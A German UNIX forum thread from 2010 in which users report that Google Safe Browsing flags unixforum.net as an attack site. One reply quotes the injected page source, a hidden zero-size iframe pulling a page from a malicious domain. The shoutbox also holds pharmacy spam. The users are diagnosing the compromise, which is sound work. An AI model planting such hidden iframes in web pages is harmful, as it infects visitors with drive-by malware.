unixforum.net - Der Treffpunkt für UNIX Fans Der Treffpunkt für UNIX Fans seit 2002
  Übersicht   Forum   Hilfe Suche Einloggen Registrieren   *
Suche
Google
Erweiterte Suche
Willkommen Gast. Bitte einloggen oder registrieren.
Haben Sie Ihre Aktivierungs E-Mail übersehen?
09. September 2010, 18:05:12

Einloggen mit Benutzername, Passwort und Sitzungslänge
Letzte 5 Shouts:
30. August 2010, 08:15:28
30. August 2010, 07:35:21
Bactroban , simvastatin doses Zovirax , accredited dermatology buy modalert without prescription , citalopram w
30. August 2010, 07:24:44
buy flonase without prescription , meridia diet pills 10 mg lexapro , how much is laser hair removal buy trazodone no
30. August 2010, 07:14:25
buy lotrel without prescription , acne treatment gel buy zelnorm no prescriptions , online diet prescriptions buy spi
30. August 2010, 07:04:59
buy online nolvadex , seasonal allergy symptoms buy cheapest betamethasone , bayer clinitek 500 online pharmacy cefadroxil[/
Spenden
Berechtigungen

Anzeige
Anzeige
Seiten: [1] 2 3   Nach unten
  Drucken  
Autor Thema: unixforum.net reported attack site  (Gelesen 1040 mal)
linuxdomination
Unix Bachelor
***
Offline Offline

Beiträge: 174



Profil anzeigen WWW
« am: 26. Juli 2010, 06:19:53 »

firefox sagt ->

Code:
Safe Browsing
Diagnostic page for unixforum.net

What is the current listing status for unixforum.net?

    Site is listed as suspicious - visiting this web site may harm your computer.

    Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

    Of the 16 pages we tested on the site over the past 90 days, 3 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-07-25, and the last time suspicious content was found on this site was on 2010-07-25.

    Malicious software includes 3 exploit(s). Successful infection resulted in an average of 2 new process(es) on the target machine.

    Malicious software is hosted on 1 domain(s), including dd5b.com/.

    This site was hosted on 1 network(s) including AS24900 (IPX).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past 90 days, unixforum.net did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

    No, this site has not hosted malicious software over the past 90 days.

How did this happen?

    In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:

    * Return to the previous page.
    * If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

Gespeichert
unixforum.net - Der Treffpunkt für UNIX Fans
« am: 26. Juli 2010, 06:19:53 »

 Gespeichert
Django2
Unix Rookie
*
Offline Offline

Beiträge: 5


Profil anzeigen
« Antworten #1 am: 26. Juli 2010, 08:27:36 »

Selbe hier:
Gespeichert
meisterdausi
Unix Master
****
Offline Offline

Beiträge: 253



Profil anzeigen
« Antworten #2 am: 26. Juli 2010, 08:36:40 »

Da müsste mal einer der Global-Admins auf der Google-Seite (Webmaster Tools) mal ein Review beantragen. Ich glaube eigentlich nicht, dass hier irgendwelche Schadsoftware in irgendeinem Verzeichnis liegt.

Viele Grüße,

meisterdausi
Gespeichert

Fleedwood
Unix Guru
*****
Offline Offline

Beiträge: 667


Profil anzeigen
« Antworten #3 am: 26. Juli 2010, 09:36:29 »

Da müsste mal einer der Global-Admins auf der Google-Seite (Webmaster Tools) mal ein Review beantragen. Ich glaube eigentlich nicht, dass hier irgendwelche Schadsoftware in irgendeinem Verzeichnis liegt.

neulich hat sich ja die "unsere" IP geändert, wer weiß was mit der IP vorher getrieben wurde...

Thomas.
Gespeichert

life is too short to spend debugging Intel parts [Van Jacobson]
Tschokko
Unix Guru
*****
Offline Offline

Beiträge: 2122



Profil anzeigen WWW
« Antworten #4 am: 26. Juli 2010, 09:59:21 »

Hab mit Firefox das gleiche Problem.

Gruß
Tschokko
Gespeichert

RISC = Really Invented by Seymour Cray?
tschokko.de - Server, Storage, Netzwerk und weiße Katzen!
unixforum.net - Der Treffpunkt für UNIX Fans
« Antworten #4 am: 26. Juli 2010, 09:59:21 »

 Gespeichert
Ebbi
Global Moderator
Unix Guru
*****
Offline Offline

Beiträge: 2222


Ubergeek


Profil anzeigen
« Antworten #5 am: 26. Juli 2010, 14:15:42 »

Warum habe ich kein Problem damit?  Huh
Gespeichert

Octane_Suicide
Unix Rookie
*
Offline Offline

Beiträge: 31


Profil anzeigen
« Antworten #6 am: 26. Juli 2010, 14:20:30 »

Hy!

Mein Safari meckert auch...siehe Anhang.

MfG,
Michael
Gespeichert
Fleedwood
Unix Guru
*****
Offline Offline

Beiträge: 667


Profil anzeigen
« Antworten #7 am: 26. Juli 2010, 14:56:26 »

Warum habe ich kein Problem damit?  Huh

man kann das "Feature" ausschalten, was ich prompt getan hab...

Thomas.
Gespeichert

life is too short to spend debugging Intel parts [Van Jacobson]
Visualev
Unix Bachelor
***
Online Online

Beiträge: 204



Profil anzeigen
« Antworten #8 am: 26. Juli 2010, 17:29:46 »

Das Problem hatte ich auch erst seit heute und nur unter dem Fuchs!
Gespeichert

meisterdausi
Unix Master
****
Offline Offline

Beiträge: 253



Profil anzeigen
« Antworten #9 am: 26. Juli 2010, 18:36:38 »

Naja,

dafür läufts ja jetzt selbst mit Fux :-D (ÄÄäähhhhhh Fuchs :-D)

Viele Grüße,

meisterdausi
Gespeichert

tassilo
Unix Bachelor
***
Online Online

Beiträge: 177



Profil anzeigen
« Antworten #10 am: 26. Juli 2010, 20:09:53 »

hmm ich hatte des öfteren probleme das sich mein konqueror auffer arbeit bei unixforum.net aufgehängt hat, aber das gleiche war auch bei sobl.... dachte aber das ist eher ein "pebcak" problem meinerseits...

tassilo
Gespeichert
meisterdausi
Unix Master
****
Offline Offline

Beiträge: 253



Profil anzeigen
« Antworten #11 am: 27. Juli 2010, 19:24:52 »

Hallo,

die Probleme sind bei mir wieder aufgetaucht.

hat bereits einer der Global-Admins bei google ein review beantragt?

http://www.google.com/support/webmasters/bin/answer.py?answer=35843&cbid=17rnp2u987osh&src=cb&lev=index

Kann das mal einer bitte machen? nicht dass hier Leute abgeschreckt werden, die uns noch gar nicht so gut kennen :-D ..

Viele Grüße,

meisterdausi
Gespeichert

Ten Little Indyans
Unix Bachelor
***
Offline Offline

Beiträge: 152


Profil anzeigen
« Antworten #12 am: 27. Juli 2010, 20:18:24 »

Leute, da ist was faul. NoScript behauptet dd5b.com blockiert zu haben. Diese Domain ist wohl vor gut einer Woche in China registriert worden.

Ein Blick in den Seitenquelltext zeigt das Problem.
Code:
</body></html><IFrAmE sRC=http://xbx.dd5b.com/index.htm wiDth=0 HeiGht=0></ifRaMe>
Gespeichert
Fleedwood
Unix Guru
*****
Offline Offline

Beiträge: 667


Profil anzeigen
« Antworten #13 am: 27. Juli 2010, 20:55:04 »

bei mir sagt noscript auch noch was von 51yes.com... und aboutus verrät dann auch China dazu...

Jetzt wäre wirklich ein Cleanup angesagt...

Thomas.
« Letzte Änderung: 27. Juli 2010, 21:04:54 von Fleedwood » Gespeichert

life is too short to spend debugging Intel parts [Van Jacobson]
chatnick
Unix Rookie
*
Offline Offline

Beiträge: 24


Profil anzeigen
« Antworten #14 am: 28. Juli 2010, 16:06:08 »

Mir ist das heute auch aufgefallen, (google hat gepetzt)

aber wieso soll das den so problematisch sein?

Wenn dann gibts hier doch bloss Unix-Malware.  Grin Grin
Gespeichert
Seiten: [1] 2 3   Nach oben
  Drucken  
 
Gehe zu:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.11 | SMF © 2006, Simple Machines LLC
TinyPortal v0.9.8 © Bloc
Prüfe XHTML 1.0 Prüfe CSS
sonnenblen.de, mood-indigo.org, unixforum.net und realcomputers.org sind Projekte der steinbruch.info GbR

Google war zuletzt hier 29. August 2010, 17:49:49